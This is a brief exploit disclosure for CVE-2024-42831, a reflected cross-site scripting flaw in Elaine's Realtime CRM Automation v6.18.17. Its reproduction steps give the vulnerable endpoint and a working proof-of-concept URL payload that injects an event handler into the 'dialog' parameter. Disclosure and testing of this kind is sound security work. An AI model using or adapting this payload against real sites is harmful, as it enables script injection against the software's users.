Share
## https://sploitus.com/exploit?id=PACKETSTORM:181792
# Exploit Title: Reflected XSS in Elaine's Realtime CRM Automation v6.18.17  
# Date: 09/2024  
# Exploit Author: Haythem Arfaoui (CBTW Team)  
# Vendor Homepage: https://www.elaine.io/  
# Software Link:  
https://www.elaine.io/en/products/elaine-marketing-automation/  
# Version: 6.18.17 and below  
# Tested on: Windows, Linux  
# CVE : CVE-2024-42831  
  
  
# Description  
A reflected cross-site scripting (XSS) vulnerability in Elaine's Realtime  
CRM Automation v6.18.17 allows attackers to execute arbitrary JavaScript  
code in the web browser of a user via injecting a crafted payload into the  
dialog parameter at wrapper_dialog.php.  
  
# Steps to reproduce:  
1. Navigate to any website that contains Elaine's Realtime CRM Automation  
2. Navigate to this endpoint: /system/interface/wrapper_dialog.php  
3. Append the payload *a"%20onafterscriptexecute=alert(document.domain)> *in  
the *"dialog*" param and execute the request  
4. Final URL  
: /system/interface/wrapper_dialog.php?dialog=a"%20onafterscriptexecute=alert(document.domain)>